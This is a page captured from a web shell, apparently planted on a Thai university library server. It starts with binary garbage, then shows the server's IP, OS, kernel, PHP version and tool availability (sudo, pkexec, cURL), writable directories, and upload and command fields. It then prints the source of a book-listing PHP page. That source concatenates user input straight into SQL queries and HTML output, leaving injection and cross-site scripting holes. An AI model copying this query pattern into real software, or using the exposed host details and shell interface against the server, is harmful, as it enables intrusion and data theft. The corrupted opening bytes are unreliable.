h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/lib/resource_book.php
<?php include 'dbconnect.php';?>
<?php include 'header3.php';?>
<script type="text/javascript">

function getURL()
{
 if(document.getElementById('TI').checked) {
  //Search Title
 var searchStr= document.getElementById('searchterm').value;
 var Title= "TI ("
 var closetag= ")"
 var searchFull1= Title.concat(searchStr);
 var searchFull= searchFull1.concat(closetag);
 document.getElementById('searchterm').value = searchFull;
}
else if(document.getElementById('AU').checked) {
  //Search Author
 var searchStr= document.getElementById('searchterm').value;
 var Author= "AU ("
 var closetag= ")"
 var searchFull1= Author.concat(searchStr);
 var searchFull= searchFull1.concat(closetag);
 document.getElementById('searchterm').value = searchFull;
}


if(document.getElementById('defaultdb').value == "JN") {
  //Search Title
 var searchStr= document.getElementById('searchterm').value;
 var Title= "PT Academic Journal AND ("
 var closetag= ")"
 var searchFull1= Title.concat(searchStr);
 var searchFull= searchFull1.concat(closetag);
 document.getElementById('searchterm').value = searchFull;
}

 }
 
</script>
<meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
  <link href="../vendor/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<style>
body {
  /*font-family: "Lato", sans-serif;*/
  margin-left: 5px;
  margin-right: 5px;
  /*background-color:#99FFCC;*/
}

.sidenav {
  height: 100%;
  width: 0;
  position: fixed;
  z-index: 1;
  top: 0;
  left: 0;
  background-color: #9FFF9F;
  overflow-x: hidden;
  transition: 0.5s;
  padding-top: 60px;
}

.sidenav a {
  padding: 8px 8px 8px 32px;
  text-decoration: none;
  font-size: 18px;
  /*color: #818181;*/
  color: #003300;
  display: block;
  transition: 0.3s;
}

.sidenav a:hover {
  color: #f1f1f1;
}

.sidenav .closebtn {
  position: absolute;
  top: 0;
  right: 25px;
  font-size: 36px;
  margin-left: 50px;
}

@media screen and (max-height: 450px) {
  .sidenav {padding-top: 15px;}
  .sidenav a {font-size: 18px;}
}


.book {
	padding: 15px 0 0 0;
	margin: auto;
}
a.book:before { /* Just to give a little puddle of a shadow without adding another element */
	content: '';
    display: block;
    width: 80%;
    height: 1em;
    background: rgba(0,0,0,.35);
    border-radius: 50%;
    position: absolute;
    bottom:-10px;
    -webkit-filter: blur(5px);
    filter: blur(5px);
    z-index:-5;
}
.shelf {
	border-bottom: 30px solid #FFCC66;
    border-left: 20px solid transparent;
    border-right: 20px solid transparent;
	top: -15px;
	z-index: -10;
}
/*Example adding pseudo element to give shelf depth*/
.shelf:after {
	content: '';
	background: #FF9900;
	height: 20px;
	width: calc(100% + 40px); /*IE9+*/
	position: absolute;
	top: 30px;
	left: 0;
	right: 0;
	z-index: 1;
	margin: 0 -20px;
}
.book-caption {
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate( -50%, -50% );
    text-align: center;
    color: white;
    font-weight: bold;
}
</style>

			<div class="banner-text-2 text-right">
				<div class="banner-bot-2">
					<h1><a href="#" class="logo text-wh editContent">ทรัพยากรสารสนเทศ</a></h1>
				</div>
			</div>
		</div>
		<!-- //banner -->
	</div>
	<!-- //home -->


	<!-- list_program -->
	<a id="list_program"></a>
<?php
function MonthThai($strMonth)
{
	$strMonthName = Array("","มกราคม","กุมภาพันธ์","มีนาคม","เมษายน","พฤษภาคม","มิถุนายน","กรกฎาคม","สิงหาคม","กันยายน","ตุลาคม","พฤศจิกายน","ธันวาคม");
	$strMonthThai=$strMonthName[$strMonth];
	return $strMonthThai;
}


// Function to get the client IP address
function get_client_ip() {
    $ipaddress = '';
    if (getenv('HTTP_CLIENT_IP'))
        $ipaddress = getenv('HTTP_CLIENT_IP');
    else if(getenv('HTTP_X_FORWARDED_FOR'))
        $ipaddress = getenv('HTTP_X_FORWARDED_FOR');
    else if(getenv('HTTP_X_FORWARDED'))
        $ipaddress = getenv('HTTP_X_FORWARDED');
    else if(getenv('HTTP_FORWARDED_FOR'))
        $ipaddress = getenv('HTTP_FORWARDED_FOR');
    else if(getenv('HTTP_FORWARDED'))
       $ipaddress = getenv('HTTP_FORWARDED');
    else if(getenv('REMOTE_ADDR'))
        $ipaddress = getenv('REMOTE_ADDR');
    else
        $ipaddress = 'UNKNOWN';
    return $ipaddress;
}
	$pagett = "รายชื่อหนังสือแยกตามหลักสูตร";
	$type_code = (isset($_GET["type_code"])) ? $_GET["type_code"] : '';
	$max_detail_length = 500;
	$num_newest_ebook = 5;
	$num_popular_ebook = 5;
	$num_week_popular_ebook = 5;
	$strKeyword = null;
	
	$dbName = "newbook";
	$conn = mysqli_connect($serverName,$userName,$userPassword,$dbName);
	mysqli_set_charset($conn,"utf8");
	
	if(isset($_POST["txtKeyword"]))
	{
		$strKeyword = $_POST["txtKeyword"];
	}
	if(isset($_GET["txtKeyword"]))
	{
		$strKeyword = $_GET["txtKeyword"];
	}
	if($strKeyword<>"") {
		$pagetitle_text = "ผลการค้นหา " . $strKeyword;;
	} elseif($type_code<>"") {
		$sql = "SELECT * from program WHERE program_id=" . $type_code ;
		$query = mysqli_query($conn,$sql);
		if($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {	
			$pagetitle_text = "รายชื่อหนังสือ สำหรับหลักสูตร " . $result["program_name"];
		} else {
			$pagetitle_text = "รายชื่อหนังสือแยกตามหลักสูตร";	
		}
	} else {
		$pagetitle_text = "รายชื่อหนังสือแยกตามหลักสูตร";		
	}


?>


<div class="container">
    <div class="row">
		<hr>
		<div align="center">
		<h2><?php echo $pagetitle_text;?></h2>
<?php
	$sql = "SELECT create_date FROM book_detail ORDER BY create_date DESC LIMIT 1";
	$query = mysqli_query($conn,$sql);
	$result=mysqli_fetch_array($query,MYSQLI_ASSOC);
	$timestamp = strtotime($result["create_date"]);
	$dd = date('j', $timestamp);
	$mm = date('n', $timestamp);
	$yy = date('Y', $timestamp)+543;
	$date_thai = $dd . "  " . MonthThai($mm) . "  " . $yy;	
	echo "<p>[ปรับปรุงข้อมูลล่าสุดวันที่ " . $date_thai . "]</p>";	
	if($strKeyword<>"") {
?>
		<p><a href="exportexcel_program.php?txtKeyword=<?php echo $strKeyword;?>"><button type="button" class="btn btn-danger">คลิกที่นี่เพื่อบันทึกเป็นไฟล์ Excel</button></a></p>
<?php
	} elseif($type_code<>"") {	 //if($strKeyword<>"") {
?>
		<p><a href="exportexcel_program.php?type_code=<?php echo $type_code;?>"><button type="button" class="btn btn-danger">คลิกที่นี่เพื่อบันทึกเป็นไฟล์ Excel</button></a></p>
<?php	
	} //if($strKeyword<>"") {	
?>		
		<a href="list_dewey.php"><button type="button" class="btn btn-primary">คลิกที่นี่เพื่อดูรายชื่อหนังสือแยกตามหมวดหมู่</button></a>&nbsp;&nbsp;&nbsp;<a href="list_program.php"><button type="button" class="btn btn-success">คลิกที่นี่เพื่อดูรายชื่อหนังสือแยกตามหลักสูตร</button></a>&nbsp;&nbsp;&nbsp;<a href="https://arit.skru.ac.th/arit/aritnews/exhibition_detail.php?exhibition_id=278"><button type="button" class="btn btn-warning">แนะนำหนังสือเพื่อให้ห้องสมุดจัดซื้อ</button></a><br><br>
			  <form class="form-inline" action="<?php echo $_SERVER['SCRIPT_NAME'];?>">
				<div class="form-group">
				  <input type="text" class="form-control" id="txtKeyword" placeholder="พิมพ์คำค้น..." name="txtKeyword" title="พิมพ์คำที่ต้องการค้นหา">
				</div>
				<button type="submit" class="btn btn-default"><i class="fa fa-search"></i></button>
			  </form>
		</div>
		<hr>
<?php
	$iorder=0;
	$sql = "SELECT * FROM book_detail ";
	if($strKeyword<>"") {
		$sql = "SELECT * FROM book_detail ";
		$sql .= " WHERE ( (title LIKE '%" . $strKeyword . "%')";
		$sql .= " OR (author LIKE '%" . $strKeyword . "%')";
		$sql .= " OR (note LIKE '%" . $strKeyword . "%') )";
	} elseif($type_code<>"") {
		if ($type_code <> "999999") {
			//$sql = "SELECT * FROM (book_detail INNER JOIN program_dewey ON book_detail.call3=program_dewey.dewey_subclass_code) ";
			//$sql .= " WHERE program_dewey.program_id=" . $type_code ;
			$sql = "SELECT book_detail.* FROM (book_detail INNER JOIN program_dewey ON ( (book_detail.call3=program_dewey.dewey_subclass_code) OR (book_detail.call4=program_dewey.dewey_subclass_code) ) ) ";
			$sql .= " WHERE program_dewey.program_id=" . $type_code ;			
			
		} else {
			$sql = "SELECT * FROM book_detail ";
		}
	}
	//$sql .= " ORDER BY book_id DESC";
	$sql .= " ORDER BY book_detail.create_date DESC";
	$query = mysqli_query($conn,$sql);
	$num_rows = mysqli_num_rows($query);
	$per_page = 24;   // Per Page
	$page  = 1;
	if(isset($_GET["Page"]))
	{
		$page = $_GET["Page"];
	}
	$prev_page = $page-1;
	$next_page = $page+1;
	$row_start = (($per_page*$page)-$per_page);
	if($num_rows<=$per_page) {
		$num_pages =1;
	} elseif(($num_rows % $per_page)==0) { //if($num_rows<=$per_page) {
		$num_pages =($num_rows/$per_page) ;
	} else { //if($num_rows<=$per_page) {
		$num_pages =($num_rows/$per_page)+1;
		$num_pages = (int)$num_pages;
	} //if($num_rows<=$per_page) {
	$row_end = $per_page;
	$sql .= " LIMIT $row_start ,$row_end";
	$query = mysqli_query($conn,$sql);
		
	$nocover = 0;
		
	while($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
		if ($result["picture"] <> "") {
			$img_location = "newbook/pages/titlepicture/" . $result["picture"];
			if (!(file_exists($img_location))) {
				$img_location = "newbook/pages/titlepicture/" . "nocover2.jpg";
				$nocover = 1;	
			} else {
				$nocover = 0;
			}			
		} else {
			$img_location = "newbook/pages/titlepicture/" . "nocover2.jpg";
			$nocover = 1;
		}	
?>
		<div class="col-xs-4 col-md-2">
        	<a href="#myModal<?php echo $result["book_id"];?>" data-toggle="modal" data-target="#myModal<?php echo $result["book_id"];?>" class="book" title="<?php echo $result["title"] . "...คลิกที่รูปเพื่อดูรายละเอียด";?>"><img src="<?php echo $img_location;?>" class="img-responsive book"></a>	
<?php
		if (($result["picture"] == "") || ($nocover==1)){
?>
          <div class="book-caption">
              <p><a href="#myModal<?php echo $result["book_id"];?>" data-toggle="modal" data-target="#myModal<?php echo $result["book_id"];?>" style="color:white;" title="<?php echo $result["title"] . "...คลิกที่รูปเพื่อดูรายละเอียด";?>"><?php echo $result["title"];?></a></p>
          </div>
<?php
		}
?>		  			
			<!-- Modal -->
			<div class="modal fade" id="myModal<?php echo $result["book_id"];?>" role="dialog">
				<div class="modal-dialog">
				
					<!-- Modal content-->
					<div class="modal-content">
						<div class="modal-header">
						  <button type="button" class="close" data-dismiss="modal">&times;</button>
						  <h4 class="modal-title"><?php echo $result["title"];?></h4>
						</div>
						<div class="modal-body">
						  <p><font color="#009900">ผู้แต่ง : </font><?php echo $result["author"];?></p>
						  <p><font color="#009900">ปีที่พิมพ์ : </font><?php echo $result["pub_year"];?></p>
						   <!--<p><font color="#009900">รายละเอียด : </font><?php //echo $result["note"];?></p>-->
<?php
		if ($nocover==0) {
?>
							<p><img src="<?php echo $img_location;?>"></p>
<?php		
		}
?>	
						</div>
						<div class="modal-footer">
<?php
		//if ($result["link"] <> "") {
?>
						  <!--<a href="title_detail.php?title_code=<?php //echo $result["book_id"];?>"><button type="button" class="btn btn-success">อ่านเล่มนี้</button></a>-->
						  <a href="<?php echo $result["link"];?>" target="_blank"><button type="button" class="btn btn-success">ดูรายละเอียดเพิ่มเติม</button></a>
<?php		
		//} //if ($result["link"] <> "") {
?>						
						  <button type="button" class="btn btn-default" data-dismiss="modal">ปิด</button>
						</div>
					</div>
				</div>
			</div>	
		  <!--end Modal-->		
		</div>
<?php
		$iorder += 1;
		if ($iorder == 3) {
?>
			<div class="col-xs-12 shelf hidden-md hidden-lg"></div>
<?php		
		} elseif ($iorder == 6) { //if ($iorder == 3) {
			$iorder = 0;
?>
			<div class="col-xs-12 shelf"></div>
<?php		
		} //if ($iorder == 3) {
	} //while($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
	if ($iorder <> 0) {
?>
			<div class="col-xs-12 shelf"></div>
<?php	
	}
?>	
	</div>
	<div class="row">
<br>
<p>จำนวน <?php echo $num_rows;?> รายการ : <?php echo $num_pages;?> หน้า</p>
<?php

if($prev_page)
{
	$fpage = $_SERVER['SCRIPT_NAME'] . "?Page=1&txtKeyword=" . $strKeyword . "&type_code=" . $type_code;
	$ppage = $_SERVER['SCRIPT_NAME'] . "?Page=" . $prev_page . "&txtKeyword=" . $strKeyword . "&type_code=" . $type_code;
	//echo " <a href='$_SERVER[SCRIPT_NAME]?Page=1&txtKeyword=$strKeyword'><< หน้าแรก</a> ";
	//echo " <a href='$_SERVER[SCRIPT_NAME]?Page=$prev_page&txtKeyword=$strKeyword'><< หน้าที่แล้ว</a> ";
?>
	<a href="<?php echo $fpage;?>"><button type="button" class="btn btn-primary"><< หน้าแรก</button></a>	
	<a href="<?php echo $ppage;?>"><button type="button" class="btn btn-info">< หน้าที่แล้ว</button></a>		
<?php
}

/*for($i=1; $i<=$num_pages; $i++){
	if($i != $page)
	{
		echo "[ <a href='$_SERVER[SCRIPT_NAME]?Page=$i&txtKeyword=$strKeyword'>$i</a> ]";
	}
	else
	{
		echo "<b> $i </b>";
	}
}*/
$num_before_current_page = 3;
$num_after_current_page = 3;
if ($page > $num_before_current_page)
{
	$before_current_page = $page - $num_before_current_page;
}
else
{
	$before_current_page = 1;
}

if (($page + $num_after_current_page)>=$num_pages)
{
	$after_current_page = $num_pages;
}
else
{
	$after_current_page = $page + $num_after_current_page;
}

for($i=$before_current_page; $i<=$page-1; $i++){
	//echo "[ <a href='$_SERVER[SCRIPT_NAME]?Page=$i&txtKeyword=$strKeyword'>$i</a> ]";
	$ipage = $_SERVER['SCRIPT_NAME'] . "?Page=" . $i . "&txtKeyword=" . $strKeyword . "&type_code=" . $type_code;
?>
	<a href="<?php echo $ipage;?>"><button type="button" class="btn btn-success"><?php echo $i;?></button></a>		
<?php
}

//echo "<b> $i </b>";
?>
	<button type="button" class="btn btn-warning"><?php echo $i;?></button>
<?php

for($i=$page+1; $i<=$after_current_page; $i++){
	//echo "[ <a href='$_SERVER[SCRIPT_NAME]?Page=$i&txtKeyword=$strKeyword'>$i</a> ]";
	$ipage = $_SERVER['SCRIPT_NAME'] . "?Page=" . $i . "&txtKeyword=" . $strKeyword . "&type_code=" . $type_code;
?>
	<a href="<?php echo $ipage;?>"><button type="button" class="btn btn-success"><?php echo $i;?></button></a>		
<?php
}

if($page!=$num_pages)
{
	//echo " <a href ='$_SERVER[SCRIPT_NAME]?Page=$next_page&txtKeyword=$strKeyword'>หน้าถัดไป >></a> ";
	//echo " <a href ='$_SERVER[SCRIPT_NAME]?Page=$num_pages&txtKeyword=$strKeyword'>หน้าสุดท้าย >></a> ";
	$npage = $_SERVER['SCRIPT_NAME'] . "?Page=" . $next_page . "&txtKeyword=" . $strKeyword . "&type_code=" . $type_code;
	$lpage = $_SERVER['SCRIPT_NAME'] . "?Page=" . $num_pages . "&txtKeyword=" . $strKeyword . "&type_code=" . $type_code;
?>
	<a href="<?php echo $npage;?>"><button type="button" class="btn btn-info">หน้าถัดไป ></button></a>	
	<a href="<?php echo $lpage;?>"><button type="button" class="btn btn-primary">หน้าสุดท้าย >></button></a>		
<?php
}
?>
<br><br>
<?php

	if($strKeyword<>"") {
?>
		<p><a href="exportexcel_program.php?txtKeyword=<?php echo $strKeyword;?>"><button type="button" class="btn btn-danger">คลิกที่นี่เพื่อบันทึกเป็นไฟล์ Excel</button></a></p>
<?php
	} elseif($type_code<>"") {	 //if($strKeyword<>"") {
?>
		<p><a href="exportexcel_program.php?type_code=<?php echo $type_code;?>"><button type="button" class="btn btn-danger">คลิกที่นี่เพื่อบันทึกเป็นไฟล์ Excel</button></a></p>
<?php	
	} //if($strKeyword<>"") {
?>
<!--<p>
<form class="form-inline" action="<?php //echo $_SERVER['SCRIPT_NAME'];?>">
    <input name="txtKeyword" type="hidden" id="txtKeyword" value="<?php //echo $strKeyword;?>">
	<div class="form-group">
		<input type="text" class="form-control" id="Page" placeholder="ไปยังหน้า..." name="Page" title="ไปยังหน้าที่ระบุ" size="3">
	</div>
	<button type="submit" class="btn btn-danger">ไปยังหน้าที่ระบุ</button>
</form>
</p>-->
<BR><BR><BR>
	</div>
</div>  

	<!-- จบlist_program -->

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit